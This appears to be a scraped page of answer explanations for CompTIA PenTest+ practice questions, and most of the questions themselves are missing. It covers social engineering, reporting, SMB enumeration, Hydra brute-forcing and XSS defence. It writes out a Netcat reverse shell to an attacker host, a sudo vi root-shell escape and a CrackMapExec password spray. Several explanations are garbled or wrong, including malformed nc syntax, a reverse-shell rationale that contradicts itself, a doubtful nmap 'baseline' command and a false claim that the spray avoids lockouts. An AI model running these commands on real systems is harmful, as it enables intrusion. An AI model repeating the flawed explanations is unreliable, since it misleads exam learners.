PT0-002 CompTIA PenTest+ Certification Exam Free Practice Exam Questions (2025 Updated)

In this scenario, the penetration tester performed a "Tailgating" attack (D), where the tester follows closely behind a legitimate employee to gain unauthorized access to a secure area without being noticed. This social engineering technique relies on exploiting human tendencies to be polite or avoid confrontation, rather than using technical hacking methods. The tester engaged the employee in casual conversation to appear less suspicious and took advantage of the situation when the employee, perhaps distracted or feeling socially obliged, held the door open for them.

A penetration tester should most likely include metrics and measures in a report at the end of an assessment. Metrics and measures provide quantitative data that helps in understanding the extent and impact of vulnerabilities found during the assessment. They offer a clear and objective way to convey the results and the effectiveness of the security controls in place. This data-driven approach aids in prioritizing remediation efforts, benchmarking against industry standards, and demonstrating improvements over time.

References:

OWASP Penetration Testing Methodologies

NIST SP 800-115 - Technical Guide to Information Security Testing and Assessment

The command sudo nmap —script=bro* -e ethO is the best choice for establishing a baseline of all IPv4 network traffic on the local VLAN without a local IP address. The —script=bro* specifies the use of scripts that can capture and analyze traffic, and -e ethO specifies the network interface to be used. This allows the vulnerability assessor to capture and analyze network traffic at a low level, which is essential for baseline analysis.

References:

Nmap Scripting Engine (NSE)

Nmap Network Interface Specification

The most efficient way to write a Python script that interacts with web applications is to import the requests library. The requests library is a Python HTTP library that simplifies making HTTP requests to web servers, which is essential for interacting with web applications. It allows you to easily send HTTP/1.1 requests, without the need for manually adding query strings to your URLs, or form-encode your POST data. Options A and B involve creating a class or function for requests, which could be more time-consuming and less efficient than using a well-established library like requests. Option D, using the cURL OS command, is less efficient in a Python script since it involves calling an external command rather than using a native Python library.

When calculating the price of a penetration test service for a client, the most important aspect to consider is the required scope of work 1. The scope of work defines the objectives of the penetration test and the systems that will be tested. It is important to understand the scope of work to determine the resources required to complete the test and the time it will take to complete the test 2.

References: 2: CompTIA. (2021). CompTIA PenTest+ Certification Exam Objectives. Retrieved from https://www.comptia.org /content/dam/comptia/documents/certifications/Exam%20Objectives/CompTIA-PenTest%2B%20Exam%20Objectives%20PT0-002.pdf 1: O’Brien, D. (2021). The Official CompTIA PenTest+ Study Guide (Exam PT0-002). John Wiley & Sons.

The output displayed is typical of what one might see when using a tool like smbclient or enum4linux to list shared directories on a system that uses the SMB (Server Message Block) protocol. Here’s a brief overview of the shared resources that have been found:

1.print$ - This share is generally used for printer drivers.

2.home - Could be a user's home directory, usually requires authentication.

3.dev - Suggests a development environment, possibly containing code, scripts, or tools that could be useful for further penetration.

4.notes - This has read and write permissions and could contain information such as user notes or documentation.

While all these shares could potentially provide valuable information, the dev share stands out for several reasons:

•Development Environment: As it seems to be a development share, it may contain scripts, tools, or code repositories which could be less secure than production environments and possibly contain sensitive information such as hardcoded credentials, configuration files, or backup files.

•Standard Names: Shares like print$ and home are common and are likely to be properly secured or to contain less sensitive information.

•Writable Share: The notes share is also interesting because it has read and write permissions, which could be exploited to upload malicious files or modify existing ones. However, the potential for finding exploitable material or sensitive information might be higher with the dev share.

In penetration testing, the goal is to find the path of least resistance that provides the highest potential for deeper access or sensitive information discovery. The dev share represents a target that could yield such information or further avenues for exploitation, making it the next logical step for enumeration.

The cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt command is used to perform SMB enumeration on the 192.168.0.0/24 subnet using a list of usernames and passwords. The -u option specifies the file containing the usernames, and the -p option specifies the file containing the passwords1. This command allows the tester to attempt to authenticate with multiple accounts without locking any of them out. References: SMB Command

A list is a data structure in Python that can store multiple values of different types in a sequential order. A list is created by enclosing the values in square brackets [ ] and separating them by commas. A list can also contain other lists as its elements, creating a nested or multidimensional list. The output of the print (var) statement shows that var is a list that contains two elements, each of which is another list with two key-value pairs. The key-value pairs are enclosed in curly braces { }, which indicate that they are dictionaries, another data structure in Python that maps keys to values. Therefore, var is a list of dictionaries. References:

•

5.Data Structures — Python 3.12.1 documentation1, section 5.1. More on Lists

•Python Data Structures - GeeksforGeeks2, section Lists in Python

•Common Python Data Structures (Guide) – Real Python3, section Lists

A retest is a follow-up assessment where the penetration tester checks if the vulnerabilities found in the initial test have been fixed or mitigated by the client. A retest can provide many benefits, such as verifying the effectiveness of the remediation actions, showing improvement to internal or external stakeholders, and reducing the risk of future exploitation. A retest is usually performed after a certain period of time, which can be agreed upon in the rules of engagement or the statement of work. A week after the scheduled maintenance window is a reasonable time frame to allow the client to apply the necessary patches or configuration changes to their network. Therefore, the client is most likely attempting to test the efficacy of the remediation effort by asking for a retest. References:

•The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 7: Reporting and Communication, page 375-376.

•Is a Re-Test Included with a Penetration Test?1

The provided Python script is designed to function as a keylogger, which is a type of surveillance software that has the capability to record every keystroke made on a computer. The script uses the pyHook library to hook into and monitor all keyboard events. When a key is pressed, the KbrdEvent function is triggered, which logs the ASCII value of the pressed key to a file named log_comptia.txt located in C:\\Windows\\Temp. The script is configured to continuously monitor keyboard events and log them, making its intended effect keylogging, rather than debugging an exploit, collecting logs in a general sense, or scheduling tasks.

Output encoding is a technique that prevents cross-site scripting (XSS) attacks by encoding the user input before displaying it on the web page. This way, any malicious scripts or HTML tags are rendered harmless and cannot execute on the browser. Output encoding is recommended by the OWASP Top 10 as a defense against XSS1. In this case, the vulnerable code is using a scriptlet to display the employee ID without any validation or encoding, which could allow an attacker to inject malicious code through the id parameter. Output encoding would prevent this by escaping any special characters in the id parameter. References: The Official CompTIA PenTest+ Student Guide (Exam PT0-002) eBook, Chapter 4, Section 4.2.1: Cross-site Scripting; Best PenTest+ certification study resources and training materials, Section 1: Cross-site Scripting (XSS) Attack; OWASP Top 10 2021, A7: Cross-site Scripting (XSS).

Hydra is a powerful tool for conducting brute-force attacks against various protocols, including SSH. It is capable of using multiple threads to perform concurrent attempts, significantly increasing the efficiency of the attack. This capability makes Hydra particularly suited for brute-forcing user passwords over SSH, as it can quickly try numerous combinations of usernames and passwords. The tool's ability to support a wide range of protocols, its flexibility in handling different authentication mechanisms, and its efficiency in managing multiple simultaneous connections make it a go-to choice for penetration testers looking to test the strength of passwords in a target system's SSH service.

An attestation of findings formally documents the results of a penetration test, as required for PCI DSS compliance. This ensures the client has clear proof of testing activities and results for regulatory purposes. This corresponds to CompTIA Pentest+ objectives under compliance-based reporting.

An executive summary provides a high-level overview of findings, focusing on critical issues and their impact. It is intended for non-technical stakeholders, aligning with CompTIA Pentest+ objectives on reporting and delivering results to diverse audiences.

A BLE (Bluetooth Low Energy) attack is specifically designed to exploit vulnerabilities in the Bluetooth Low Energy protocol, which is commonly used in modern wireless devices, including key fobs for electric vehicles. This type of attack can allow a penetration tester to intercept, manipulate, or take control of the communication between the key fob and the vehicle. Bluejacking and Bluesnarfing are older Bluetooth attacks that are less effective against modern BLE implementations. WPS PIN attacks target Wi-Fi Protected Setup, which is unrelated to key fobs and electric vehicles.

When the penetration tester has NOPASSWD privileges to run vi as root, the quickest way to escalate privileges is to leverage vi to execute a shell. The command sudo vi -c ':!bash' opens vi as the root user and immediately spawns a shell within vi. This method is fast and effective because vi (or vim) has the capability to run shell commands.

Executing sudo vi -c ':!bash' will open vi and then immediately run the :!bash command, which spawns a Bash shell with root privileges.

References:

GTFOBins - vi

Example from penetration testing reports where vi is used to escalate privileges: Writeup​​.

Client acceptance (A) is a critical post-report delivery activity that involves the client formally accepting the findings and conclusions of a penetration assessment report. This process usually includes a review of the findings by the client, discussions about the impact, and agreement on the accuracy and relevance of the reported vulnerabilities and issues. Ensuring client acceptance soon after the delivery of the report can prevent scenarios where the validity of findings is debated long after the assessment, as in the case described.

Data destruction process (B), attestation of findings (C), and lessons learned (D) are also important aspects of a penetration testing engagement, but they do not directly address the issue of the client disputing the findings well after the report has been delivered. Client acceptance ensures both parties are in agreement on the outcomes of the assessment, minimizing disputes about the findings later on.

When a firewall is blocking outbound traffic, a penetration tester can attempt to use a reverse shell to obtain an interactive shell on the remote host. The command nc -e host 8443 /bin/bash uses Netcat to create a reverse shell, connecting back to the attacker's machine on port 8443 and executing /bin/bash.

This command assumes that outbound traffic is allowed on the specified port (8443) and that Netcat is available on the target system. It effectively bypasses the firewall's restrictions by initiating the connection from the inside.

References:

Explanation of reverse shell techniques: Pentestmonkey Reverse Shell Cheat Sheet

Practical examples from penetration testing scenarios: Horizontall​​.